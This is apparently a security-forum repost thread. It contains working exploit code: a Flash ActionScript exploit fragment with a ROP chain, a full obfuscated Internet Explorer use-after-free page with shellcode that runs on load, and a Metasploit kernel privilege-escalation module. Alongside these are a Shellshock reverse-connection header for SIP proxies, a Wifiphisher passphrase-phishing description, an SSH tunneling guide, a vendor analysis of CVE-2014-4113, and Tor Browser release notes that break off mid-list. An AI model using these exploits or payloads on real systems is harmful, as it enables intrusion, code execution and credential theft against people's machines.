0xcccccccc // shellcode ob[i0][18] = 0xcccccccc // shellcode ob[i0][19] = 0xcccccccc // shellcode ob[i0][979] = flash + 0x0029913A // POP EAX # RETN ob[i0][980] = 0x00000f58 ob[i0][981] = flash + 0x00195558 // PUSH ESP # POP ESI # RETN ob[i0][982] = flash + 0x0036B3B2 // SUB ESI,EAX # POP ECX # MOV EAX,ESI # POP ESI # RETN ob[i0][985] = flash + 0x0095024c // XCHG EAX,ESP # RETN ob[i0][1007] = flash + 0x0095024c // XCHG EAX,ESP # RETN break } } ob[i1][0xFFFFFFFE - 1024 * 3] = 4096 ob[i0][1024 * 3 - 2] = 0 str += flash.toString(16) var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf) if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit) } private function write(addr:uint, data:uint):void { ob[i0][(addr - vector) / 4 - 2] = data } private function read(addr:uint):uint { return ob[i0][(addr - vector) / 4 - 2] } private function zeroPad(number:String, width:int):String { if (number.length < width) return "0" + zeroPad(number, width-1) return number } public function exploit():void { snd.toString() } } } [/LIST] Sursa: [ActionScript 3] CVE-2014-0556 - Pastebin.com

MSIE Use After Free EXP/CVE-2013-1347 [URL="http://pastebin.com/JN2GiB8n#"][img=http://pastebin.com/i/t.gif][/URL] [LIST=1] <!doctype html> <HTML XMLNS:t ="urn:schemas-microsoft-com:time"> <head> <meta> <?IMPORT namespace="t" implementation="#default#time2"> </meta> <script> pRESSURA = eval('unescape'); fAHPARIC = CollectGarbage; dISCESA = '%u'; function rIGUARDI(rEPLACEMENT) { return pRESSURA(dISCESA + rEPLACEMENT.substring(4, 8) + dISCESA + rEPLACEMENT.substring(0, 4)); } function vILMENTE(tRIPARTITO) { rAPPACIATI = (tRIPARTITO >>> 24).toString((0x10)); if (rAPPACIATI.length == 0x1) rAPPACIATI = "0" + rAPPACIATI; mOSTRARTI = ((tRIPARTITO >>> 16) & (0xff)).toString((0x10)); if (mOSTRARTI.length == 0x1) mOSTRARTI = "0" + mOSTRARTI; tERRENE = ((tRIPARTITO >>> 8) & (0xff)).toString((0x10)); if (tERRENE.length == 0x1) tERRENE = "0" + tERRENE; pRINCIPIO = (tRIPARTITO & (0xff)).toString((0x10)); if (pRINCIPIO.length == 0x1) pRINCIPIO = "0" + pRINCIPIO; return rAPPACIATI + mOSTRARTI + tERRENE + pRINCIPIO; } function ue(dw) { return rIGUARDI(vILMENTE(dw)); } function setc() { var Then = new Date() Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 3) document.cookie = "Cookie1=fucktheothers;expires=" + Then.toGMTString() } function readc() { var cookieString = new String(document.cookie); if (cookieString.indexOf("fucktheothers") == -1) { return 0 } else { return 1; } } function DropPayload() { // en = 77c10000 // kr = 77bc0000 // offset = 50000 var r = ""; r+= ue( 0x77bd4cfa ); // # POP EBP # RETN [msvcrt.dll] r+= ue( 0x77bd4cfa ); // # skip 4 bytes [msvcrt.dll] r += ue( 0x77BFFA1C); // # POP EBX # RETN [msvcrt.dll] r += ue( 0xffffffff ); // # EBX 0xffffffff (inc 201) for(i=0;i<=0x201;i++) { r += ue( 0x7d710b7e ); // # INC EBX # RETN [shell32.dll] } r+= ue( 0x77be4de1 ); // # POP EAX # RETN [msvcrt.dll] r+= ue( 0x2cfe04a7 ); // # put delta into eax (-> put += 0x00000040 into edx) r+= ue( 0x77bfeb80 ); // # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] r+= ue( 0x77c08fbc ); // # XCHG EAX,EDX # RETN [msvcrt.dll] r+= ue( 0x77bde33f ); // # POP ECX # RETN [msvcrt.dll] r+= ue( 0x77c0e062 ); // # &Writable location [msvcrt.dll] r+= ue( 0x77bf6116 ); // # POP EDI # RETN [msvcrt.dll] r+= ue( 0x77bf7a42 ); // # RETN (ROP NOP) [msvcrt.dll] r+= ue( 0x77beb8ba ); // # POP ESI # RETN [msvcrt.dll] r+= ue( 0x77bdaacc ); // # JMP [EAX] [msvcrt.dll] r+= ue( 0x77beb860 ); // # POP EAX # RETN [msvcrt.dll] r+= ue( 0x77bc1120 ); // # ptr to &VirtualProtect() [IAT msvcrt.dll] r+= ue( 0x77d03ad9); // # PUSHAD # RETN [user32.dll] r+= ue( 0x77c01025 ); // # ptr to 'push esp # ret ' [msvcrt.dll] return r; } function align_esp() { var r= ""; r += ue(0x77BFD801); return r; } function xchg_esp() { var r=""; r += ue(0x77BC5ED5); return r; } function helloWorld() { if (readc()) return; setc(); unicorn = unescape("ABCD"); unicorn2 = unescape("EEEE"); for (i=0; i < 2; i++) { unicorn += unescape("ABCD"); }unicorn += unescape("AB"); unicorn += DropPayload(); unicorn += "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\uFFE8\uFFFF\uC2FF\u9158\u8390\u04C4\u498D\u4112\u3180\u8089\u9039\uF775\uDB62\u02BF\uB5FC\u02BF\uBCFD\u8AF1\uDF7C\u02B7\uA9FF\u7C8A\u40BA\uC8C0\uBA24\uBF52\u3786\uA19D\u5FB3\u81FD\u4248\u8A84\uC953\u6662\u56B2\u6EFC\uB7D7\uD702\u8AAD\uEF54\u02B7\uC285\u02B7\u95D7\u548A\u02B7\u028D\u4C8A\uFC4A\uE5FB\uE6E4\uA7E7\uE5ED\u89E5\u49BA\u8AED\uB9C9\u86F1\u02B7\u85C9\u02B7\u95F9\uB724\uC902\u6281\uB785\uC902\uB7BD\uC904\uB7F5\uC902\u1CB5\uBA36\u0343\u61D2\u7609\u7676\u6508\u8889\u8989\uE1DD\u8889\u8989\u5976\uB136\u25AB\u616E\u76E1\u7676\u52BA\u7D02\uDADD\uDFDA\u5976\u0736\u87C7\u6165\u76DD\u7676\u650A\uBF8D\uA50A\uECAD\u5976\uD91C\uBF36\uA693\u61F9\u76B7\u7676\u02D4\uBA7D\uDA52\uDFDA\u8961\u8989\uD689\u4E0A\uDEC3\u61DA\u8989\u8989\u0AD6\u864E\uDCDE\u6502\uC9C9\uC9C9\u76C9\u3669\u7711\u8703\u8461\u7676\u0276\uE37D\uDF89\u8961\u8989\uD689\u4E0A\uDE86\u02DC\uC965\uC9C9\uC9C9\u6976\uF736\u6B51\u61FA\u7763\u7676\u76DA\uE159\uFDFD\uB3F9\uA6A6\uA7B8\uBABB\uA7BD\uB8B0\uBDA7\uA6BA\uECFA\uFAF1\uF1EC\uECA7\uECF1\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u1989\u1919\u1919\u1919\u1919"; animvalues = align_esp(); for (i=0; i < 0x70/4; i++) { if (i == 0x70/4-1) { animvalues += xchg_esp(); } else { animvalues += align_esp(); } } animvalues += unicorn; for(i = 0; i < 13; i++) { animvalues += ";red"; } f0 = document.createElement('span'); document.body.appendChild(f0); f1 = document.createElement('span'); document.body.appendChild(f1); f2 = document.createElement('span'); document.body.appendChild(f2); document.body.contentEditable="true"; f2.appendChild(document.createElement('datalist')); f1.appendChild(document.createElement('span')); f1.appendChild(document.createElement('table')); try{ f0.offsetParent=null; }catch(e) { }f2.innerHTML=""; f0.appendChild(document.createElement('hr')); f1.innerHTML=""; fAHPARIC(); try { a = document.getElementById('myanim'); a.values = animvalues; } catch(e) {} } </script> </head> <body onload="eval(helloWorld());"> <t:ANIMATECOLOR id="myanim"/> </body> </html> @PhysicalDrive0 [/LIST] Sursa: MSIE Use After Free EXP/CVE-2013-1347 - Pastebin.com

[h=1]Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation[/h] ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel include Msf::Post::File include Msf::Post::Windows::FileInfo include Msf::Post::Windows::Priv include Msf::Post::Windows::Process def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation', 'Description' => %q{ A vulnerability within Microsoft Bluetooth Personal Area Networking module, BthPan.sys, can allow an attacker to inject memory controlled by the attacker into an arbitrary location. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC 'Jay Smith <jsmith[at]korelogic.com>' # MSF module ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Targets' => [ ['Windows XP SP3', { 'HaliQuerySystemInfo' => 0x16bba, '_KPROCESS' => "\x44", '_TOKEN' => "\xc8", '_UPID' => "\x84", '_APLINKS' => "\x88" } ] ], 'References' => [ [ 'CVE', '2014-4971' ], [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ], [ 'OSVDB', '109387' ] ], 'DisclosureDate' => 'Jul 18 2014', 'DefaultTarget' => 0 )) end def ring0_shellcode tokenswap = "\x60\x64\xA1\x24\x01\x00\x00" tokenswap << "\x8B\x40\x44\x50\xBB\x04" tokenswap << "\x00\x00\x00\x8B\x80\x88" tokenswap << "\x00\x00\x00\x2D\x88" tokenswap << "\x00\x00\x00\x39\x98\x84" tokenswap << "\x00\x00\x00\x75\xED\x8B\xB8\xC8" tokenswap << "\x00\x00\x00\x83\xE7\xF8\x58\xBB" tokenswap << [session.sys.process.getpid].pack('V') tokenswap << "\x8B\x80\x88\x00\x00\x00" tokenswap << "\x2D\x88\x00\x00\x00" tokenswap << "\x39\x98\x84\x00\x00\x00" tokenswap << "\x75\xED\x89\xB8\xC8" tokenswap << "\x00\x00\x00\x61\xC3" end def fill_memory(proc, address, length, content) session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE") unless proc.memory.writable?(address) vprint_error("Failed to allocate memory") return nil end vprint_good("#{address} is now writable") result = proc.memory.write(address, content) if result.nil? vprint_error("Failed to write contents to memory") return nil end vprint_good("Contents successfully written to 0x#{address.to_s(16)}") return address end def disclose_addresses(t) addresses = {} hal_dispatch_table = find_haldispatchtable return nil if hal_dispatch_table.nil? addresses['halDispatchTable'] = hal_dispatch_table vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}") vprint_status('Getting the hal.dll base address...') hal_info = find_sys_base('hal.dll') if hal_info.nil? vprint_error('Failed to disclose hal.dll base address') return nil end hal_base = hal_info[0] vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16)}") hali_query_system_information = hal_base + t['HaliQuerySystemInfo'] addresses['HaliQuerySystemInfo'] = hali_query_system_information vprint_good("HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}") addresses end def check if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/ return Exploit::CheckCode::Safe end os = sysinfo["OS"] return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') return Exploit::CheckCode::Safe unless handle session.railgun.kernel32.CloseHandle(handle) return Exploit::CheckCode::Vulnerable end def exploit if is_system? fail_with(Exploit::Failure::None, 'Session is already elevated') end unless check == Exploit::CheckCode::Vulnerable fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system") end handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') if handle.nil? fail_with(Failure::NoTarget, "Unable to open \\\\.\\bthpan device") end my_target = targets[0] print_status("Disclosing the HalDispatchTable address...") @addresses["halDispatchTable"] + 0x4, 0) session.railgun.kernel32.CloseHandle(handle) print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...") session.railgun.ntdll.NtQueryIntervalProfile(2, 4) print_status("Checking privileges after exploitation...") unless is_system? fail_with(Failure::Unknown, "The privilege escalation wasn't successful") end print_good("Privilege escalation successful!") p = payload.encoded print_status("Injecting #{p.length} bytes to memory and executing it...") unless execute_shellcode(p) fail_with(Failure::Unknown, "Error while executing the payload") end end end Sursa: http://www.exploit-db.com/exploits/34982/

SSH tunnel [TABLE=class: toc] [TR] [TD]Contents 1 simple port forwarding (SSH tunneling) 1.1 port forwarding through an intermediary 1.2 reverse port forwarding 1.3 tricky reverse forwarding 1.4 Using scp through a DMZ gateway to a machine behind a firewall using a tunnel [*]2 Other options [*]3 SOCKS5 with Firefox [/TD] [/TR] [/TABLE] simple port forwarding (SSH tunneling) This example creates a tunnel for HTTP. This will forward port 80 of your localhost to port 80 of Example Domain. ssh -f -N -q -L 80:localhost:80 username@www.example.com This example creates a tunnel for IMAP. Here we forward port 1143 on localhost to 143 (IMAP) on imap.example.com. ssh -f -N -q -L 1143:localhost:143 username@imap.example.com -f tells ssh to go into the background (daemonize). -N tells ssh that you don't want to run a remote command. That is, you only want to forward ports. -q tells ssh to be quiet -L specifies the port forwarding port forwarding through an intermediary You can have the remote machine forward ports to a third machine. This is useful where your have your local machine outside a firewall; a visible machine on the DMZ; and a third machine invisible to the outside. This creates a tunnel from your localhost port 81 to 192.168.1.69 port 80 through dmz.example.com. This lets you see the web server from outside a LAN. ssh -f -N -q -L 81:192.168.1.69:80 username@dmz.example.com This example creates a tunnel for SSH itself, over localhost port 2222. ssh -f -N -q -L 2222:target-host.example.com:22 username@dmz.example.com This example creates a tunnel for IMAP. Here we forward port 1143 on localhost to 143 (IMAP) on 192.168.1.100 through dmz.example.com. ssh -f -N -q -L 1143:192.168.1.100:143 username@dmz.example.com VNC Viewer uses port 5900. This shows a double-hop. # localhost --> wan-gateway --> dmz-gateway --> vnc-console ssh -L 5900:localhost:5900 root@wan-gateway.example.com ssh -L 5900:vnc-console.example.com:5900 root@dmz-gateway.example.com reverse port forwarding This is used in the following situation: You have a server inside a private LAN that you want to connect to from the WAN outside. You can't create a NAT and port forwarding on your firewall to map the machine to the outside. You have a server outside that you can connect to from the server inside the LAN. What this does is creates a connection from the server in the LAN to the server outside. Once that connection is established the server outside starts listening on port 2222. All connections to port 2222 are sent back to port 22 of the server in the LAN. Now you can leave this connection running in your office; go home and ssh to your proxy server at port 2222 and you will be connecting to your server inside the LAN on port 22. ssh -f -N -q -R 2222:localhost:22 my_name@remote.example.com tricky reverse forwarding This allows a server on an internal LAN expose a service to the outside WAN. For example, I have a database server that will only accept connections from a specific development box. That dev box is inside the firewall. I want to connect to the database from outside the firewall. ssh -t -L 5432:localhost:1999 my_name@firewall.example.com ssh -t db_server ssh -t -R 1999:127.0.0.1:5432 my_name@firewall Using scp through a DMZ gateway to a machine behind a firewall using a tunnel First you setup port forwarding through an intermediary. This forwards your localhost port 2222 to port 22 on 192.168.1.100. Remember, that 192.168.1.100 is not on your local network; 192.168.1.100 is on the LAN network shared with 208.77.188.166. ssh -f -N -q -L 2222:192.168.1.100:22 user@208.77.188.166 scp -P 2222 transformers.avi user@localhost:. A diagram might help. Remember, port 22 is the SSH server port on the 192.168.1.100 machine. +---------------+ +----------------+ +----------------------+ | your | | remote DMZ | | server on remote LAN | | local machine | | server | | 192.168.1.100 | | | | 208.77.188.166 | | | | 2222: >-------| |-------> :22 | | | |\______________/| | | | | | | | | +---------------+ +----------------+ +----------------------+ Other options -o ExitOnForwardFailure=yes \ -o GSSAPIAuthentication=no \ -o GSSAPIAuthentication=no \ -o HashKnownHosts=no \ -o KbdInteractiveAuthentication=no \ -o PermitLocalCommand=yes \ -o LocalCommand="logger connected to %h" \ -o LocalForward=00:remote.example.com:000 \ -o ExitOnForwardFailure=yes \ -o NoHostAuthenticationForLocalhost=yes \ -o ProxyCommand=foo \ -o RemoteForward=foo \ -o RequestTTY=yes \ -o SendEnv=LC_* \ -o Tunnel=ethernet \ -o TunnelDevice=any:any \ -o VerifyHostKeyDNS=yes SOCKS5 with Firefox Simple and secure web browsing. You can setup a tunnel as described above or you can use the following technique. This starts SSH on your localhost acting as a SOCKS proxy. Once you start SSH this way you can point any application that supports a SOCKS5 interface to this port. But these instructions will show what you need to do to get Firefox to proxy through SOCKS. Firefox supports SOCKS with no extra add-ons. Start ssh an connection to a host that you want to proxy through. Use the -D option to specify a SOCKS5 port on your localhost. The port doesn't really matter. You just need to use the same port in your SOCKS client application. ssh -D 9999 username@proxy.example.com In Firefox select "Edit | Preferences | Advanced Tab | Connection Settings button". Then select "Manual proxy configuration". All you need to fill out is "SOCKS Host: Localhost", "Port: 9999", then select "SOCKS v5". It's easy. This tool can also help in switching the proxy settings on and off: SwitchProxy Tool Sursa: SSH tunnel - Noah.org

Sau iti iei un mar: Sistem Desktop PC Mac mini cu procesor Intel® Core™ i7 2.30GHz, 4GB, 2TB, Intel® HD Graphics, OS X Server, RO - eMAG.ro

An Analysis of A Windows Kernel-Mode Vulnerability (CVE-2014-4113) 6:35 pm (UTC-7) | by Weimin Wu (Threat Analyst) Three zero-day vulnerabilities - CVE-2014-4114, CVE-2014-4148, and CVE-2014-4113 - were reported last week and patched by Microsoft in their October 2014 Patch Tuesday. CVE-2014-4114, also known as the Sandworm vulnerability, can enable attackers to easily craft malware payloads when exploited. This particular vulnerability has been linked to targeted attacks against European sectors and industries. In addition, our researchers found that Sandworm was also being used to target hit SCADA systems. The latter two vulnerabilities (CVE-2014-4148, CVE-2014-4113) leveraged vulnerabilities in the Windows kernel (Win32k.sys), affecting most Windows versions. In 2013, only one Windows kernel zero-day, was made public; this particular vulnerability only affected some versions of Windows XP and Windows 2003. These new zero-days could be a sign that attackers are possibly shifting their focus back to kernel vulnerabilities. CVE-2014-4113 allows for the elevation of privileges when exploited successfully. Microsoft addressed this in MS14-058. The vulnerability affects both desktop and server versions from Windows XP and Server 2003 up to Windows 8.1 and Server 2012 R2. However, the currently available exploit code does not affect Windows 8 and later versions. With a parameter in the command line, the exploit code can create new processes with System privileges of an assigned program. EoP exploits are also believed to be used in targeted attacks, since the exploitable application does not have the privileges needed by attackers. This was seen in Stuxnet which employed CVE-2010-2743 (also in Win32k.sys) to EoP after using other exploit to infect system. The analysis of this vulnerability and its exploit will be based on samples with the following MD5 hashes: 70857e02d60c66e27a173f8f292774f1 f9f01ce747679b82723b989d01c4d927 We detect these as TROJ_APOLMY.A and TROJ64_APOLMY.A, with the latter being the version found on 64-bit systems. Everything you need to know about the Win32k.sys vulnerability Win32k.sys is responsible for window management, and any GUI process/thread that will use it. Its related user-mode modules are user32.dll and GDI32.dll. Due to the complex interaction with user-mode applications, there are many problems in Win32k.sys. Let’s take a closer look on the vulnerability being exploited. The essential problem is the function return value is not validated correctly. Programmers tend to overlook this, but doing otherwise is a serious security risk. In Win32k.sys, there is a function called xxxMNFindWindowFromPoint(), which returns the address of win32k!tagWND structure or error code -1, -5. Another function xxxHandleMenuMessages() will call it and use its return value as parameter of xxxSendMessage(). Below is the pseudo code: xxxHandleMenuMessages() { tagWnd* pWnd = xxxMNFindWindowFromPoint(…); … //without checking if the return value is a valid address xxxSendMessage(pwnd,…); } Obviously, if the error code -1 or -5 is used in xxxSendMessage() as an address, it will result in an error, such as a blue screen. In user-mode code, this is currently not exploitable. We will see how the sample exploits this vulnerability in kernel-mode in the next section. Below are the key steps or description on how the exploit occurs: Map a prepared memory section to NULL page, which includes a fake win32k!tagWND structure and a pointer to shell code for EoP in that structure. Trigger the bug and make the return value (pWnd) of xxxMNFindWindowFromPoint() to be -5 (0xfffffffb). Because all to-be-checked fields in the fake structure are accessible and in proper values, xxxSendMessage() will treat -5 as a valid address. It will then call a function pointer in the structure, which is the pointer to the shell code. Replace the token in EPROCESS to elevate to SYSTEM privileges in shell code. Create a child process with SYSTEM privileges of the assigned program The sample uses SetWindowsHookEx () to control xxxMNFindWindowFromPoint() to return -5: Create a window and 2-level popup menu. Hook that window’s wndproc call. Track popup menu on the window and enter hook callback. In the hook callback, it changes wndproc of the menu to another callback. In menu’s callback, it will destroy the menu and return -5 (PUSH 0xfffffffb; POP EAX) Lead to xxxMNFindWindowFromPoint() on the destroyed menu return -5 Furthermore, the shell code of the sample is simple and direct, as can be seen from the snippet below. We can see that it gets EPROCESS of SYSTEM process (PID=4), and copies its privilege token to EPROCESS of current process. Figure 1. Code snippet of the sample From the analysis, we can see that it is easier to exploit these kernel vulnerabilities than to exploit vulnerabilities like Internet Explorer UAF vulnerabilities. Some effective protections in user-mode, like DEP, is easily bypassed in kernel-mode exploits. This is because a program, instead of entered data or script, is used to exploit the bug. Such code is by its nature already executable. With more application sandboxing adopted in the OS, kernel vulnerabilities will be more important for privilege elevation. Though this exploitation method is not new anymore, it will be noticed by attackers, especially now that CVE-2014-4113 is public. During our sample sourcing, we even saw that the source code of an exploit creation tool was exposed. It is expected that more exploits variants will be created by attackers. We believe that threat actors and attackers need kernel vulnerability to carry out EoP attacks and break application sandboxing. Once information about these exploitation methods become more prevalent, we may see more similar kernel zero-day vulnerabilities in the future. Windows 7 and Windows XP are the versions of Windows most at risk of this attack. Enterprises are heavy users of both versions, and may be affected by this threat. We highly recommend that users and system administrators apply the relevant patches and keep their systems up-to-date. Windows 8 and later versions are at less risk, as the currently available exploit code is blocked on these versions. This is because of a new security feature known as Supervisor Mode Execution Prevention (SMEP), which prevents the access (read/write/execute) of user-mode memory pages in kernel-mode. As such, the access to null page and shell code will not lead to code execution, although it will lead to crashes. Trend Micro is continuously monitoring the threat landscape for any developments regarding these vulnerabilities including Sandworm. For more information on them, you may read our other articles: Sandworm to Blacken: The SCADA Connection An Analysis of Windows Zero-day Vulnerability ‘CVE-2014-4114’ aka “Sandworm” MS Zero-Day Used in Attacks Against European Sectors, Industries Sursa: An Analysis of A Windows Kernel-Mode Vulnerability (CVE-2014-4113) | Security Intelligence Blog | Trend Micro

18 October 2014 | 734 views RIPS – Static Source Code Analysis For PHP Vulnerabilities RIPS is a tool written in PHP to find vulnerabilities using static source code analysis for PHP web applications. By tokenizing and parsing all source code files RIPS is able to transform PHP source code into a program model and to detect sensitive sinks (potentially vulnerable functions) that can be tainted by user input (influenced by a malicious user) during the program flow. Besides the structured output of found vulnerabilities RIPS also offers an integrated code audit framework for further manual analysis. Features detect XSS, SQLi, File disclosure, LFI/RFI, RCE vulnerabilities and more 5 verbosity levels for debugging your scan results mark vulnerable lines in source code viewer highlight variables in the code viewer user-defined function code by mouse-over on detected call active jumping between function declaration and calls list of all user-defined functions (defines and calls), program entry points (user input) and scanned files (with includes) connected to the source code viewer graph visualization for files and includes as well as functions and calls create CURL exploits for detected vulnerabilties with few clicks visualization, description, example, PoC, patch and securing function list for every vulnerability 7 different syntax highlighting colour schemata display scan result in form of a top-down flow or bottom-up trace only minimal requirement is a local webserver with PHP and a browser (tested with Firefox) regex search function There are other PHP-centric tools we’ve covered such as: – RATS – Rough Auditing Tool for Security – Skavenger – Source Code Auditing Tool! – SpikeSource Spike PHP Security Audit Tool If you are interested in more tools of this type you can find our complete list here (which covers various languages) – Code Auditing Tools. NOTE: The authors have stated that RIPS 0.5 development is abandoned. A complete rewrite is in the works and used as an academic prototype but it is not publicly available yet. So we’ll be keeping an eye on what happens with that. But for now you can download RIPS here: rips-0.54.zip Or read more here. Sursa: RIPS - Static Source Code Analysis For PHP Vulnerabilities - Darknet - The Darkside

[h=2]About[/h] Wifiphisher is a security tool that mounts fast automated phishing attacks against WPA networks in order to obtain the secret passphrase. It is a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining WPA credentials. Wifiphisher works on Kali Linux and is licensed under the MIT license. From the victim's perspective, the attack makes use in three phases: Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's wifi devices within range by sending deauth packets to the client from the access point, to the access point from the client, and to the broadcast address as well. Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will start connecting to the rogue access point. After this phase, the victim is MiTMed. Victim is being served a realistic router config-looking page. wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for WPA password confirmation due to a router firmware upgrade. Performing MiTM attack [h=2]Usage[/h] [h=2]Screenshots[/h] Targeting an access point A successful attack [h=2]Requirements[/h] Kali Linux. Two network interfaces, one wireless. A wireless card capable of injection. [h=2]Credits[/h] The idea belongs to Dan McInerney who also authored two essential modules of this script, wifijammer and fakeAP. [h=2]License[/h] Wifiphisher is licensed under the MIT license. See LICENSE for more information. Sursa: https://github.com/sophron/wifiphisher

Usage: sipshock [ Flags ] [ IP Addresses ] Usage flags: lhost : Local listening address lport : Local listening port (default 10111) rport : Remote port (default 5060) The exec module in Kamailio, Opensips and propably every other SER fork passes the received SIP headers as environment variables to the invoking shell. This makes these SIP proxies vulnerable to CVE-2014-6271 (Bash Shellshock). If a proxy is using any of the exec funtions and has the 'setvars' parameter set to the default value '1' then by sending SIP messages containing a specially crafted header we can run arbitrary code on the proxy machine. Sipshock tries to detect such vulnerable proxies by sending SIP INVITE Messages containing the following header: "X-Ploit: () { :;};exec >/dev/tcp/xx.xx.xx.xx/yy" where xx.xx.xx.xx/yy is the local IP and port that sipshock listens to. A vulnerable server will invoke a shell that will execute the code above and open a tcp connection to xx.xx.xx.xx:yy. Sipshock detects the connection and lists the server as vulnerable. This program is free software, distributed under the terms of the GNU General Public License Version 3. See the LICENSE file at the top of the source tree. Sursa: https://github.com/zaf/sipshock

pdate (Oct 16 20:35 UTC): The meek transport still needs performance tuning before it matches other more conventional transports. Ticket numbers are now listed in the post. The first release of the 4.0 series is available from the Tor Browser Project page and also from our distribution directory. This release features important security updates to Firefox. Additionally, due to the POODLE attack, we have also disabled SSLv3 in this release. The primary user-facing change since the 3.6 series is the transition to Firefox 31-ESR. More importantly for censored users who were using 3.6, the 4.0 series also features the addition of three versions of the meek pluggable transport. In fact, we believe that both meek-amazon and meek-azure will work in China today, without the need to obtain bridge addresses. Note though that we still need to improve meek's performance to match other transports, though. so adjust your expectations accordingly. See tickets #12428, #12778, and #12857 for details. This release also features an in-browser updater, and a completely reorganized bundle directory structure to make this updater possible. This means that simply extracting a 4.0 Tor Browser over a 3.6.6 Tor Browser will not work. Please also be aware that the security of the updater depends on the specific CA that issued the www.torproject.org HTTPS certificate (Digicert), and so it still must be activated manually through the Help ("?") "about browser" menu option. Very soon, we will support both strong HTTPS site-specific certificate pinning (ticket #11955) and update package signatures (ticket #13379). Until then, we do not recommend using this updater if you need stronger security and normally verify GPG signatures. There are also a couple behavioral changes relating to NoScript since 3.6. In particular, by default it now enforces script enable/disable for all sub-elements of a page, so you only need to enable scripts once for a page to work, rather than enabling many sub-scripts. This will hopefully make it possible for more people to use the "High Security" setting in our upcoming Security Slider, which will have Javascript disabled globally via NoScript by default. While we do not recommend per-element whitelisting due to fingerprinting, users who insist on keeping this functionality may wish to check out RequestPolicy. Note to MacOS users: We intend to deprecate 32bit OSX bundles very soon. If you are still using 32bit OSX 10.6, you soon will need to either update your OS to a later version, or begin using the Tails live operating system. Here is the changelog since 4.0-alpha-3: All Platforms Update Firefox to 31.2.0esr Update Torbutton to 1.7.0.1 Bug 13378: Prevent addon reordering in toolbars on first-run. Bug 10751: Adapt Torbutton to ESR31's Australis UI. Bug 13138: ESR31-about:tor shows "Tor is not working" Bug 12947: Adapt session storage blocker to ESR 31. Bug 10716: Take care of drag/drop events in ESR 31. Bug 13366: Fix cert exemption dialog when disk storage is enabled. [*]Update Tor Launcher to 0.2.7.0.1 Translation updates only [*]Udate fteproxy to 0.2.19 [*]Update NoScript to 2.6.9.1 [*]Bug 13027: Spoof window.navigator useragent values in JS WebWorker threads [*]Bug 13016: Hide CSS -moz-osx-font-smoothing values. [*]Bug 13356: Meek and other symlinks missing after complete update. [*]Bug 13025: Spoof screen orientation to landscape-primary. [*]Bug 13346: Disable Firefox "slow to start" warnings and recordkeeping. [*]Bug 13318: Minimize number of buttons on the browser toolbar. [*]Bug 10715: Enable WebGL on Windows (still click-to-play via NoScript) [*]Bug 13023: Disable the gamepad API. [*]Bug 13021: Prompt before allowing Canvas isPointIn*() calls. [*]Bug 12460: Several cross-compilation and gitian fixes (see child tickets) [*]Bug 13186: Disable DOM Performance timers [*]Bug 13028: Defense-in-depth checks for OCSP/Cert validation proxy usage [*]Bug 13416: Defend against new SSLv3 attack (poodle). Here is the list of all changes in the 4.0 series since 3.6.6: All Platforms Update Firefox to 31.2.0esr Udate fteproxy to 0.2.19 Update Tor to 0.2.5.8-rc (from 0.2.4.24) Update NoScript to 2.6.9.1 Update Torbutton to 1.7.0.1 (from 1.6.12.3) Bug 13378: Prevent addon reordering in toolbars on first-run. Bug 10751: 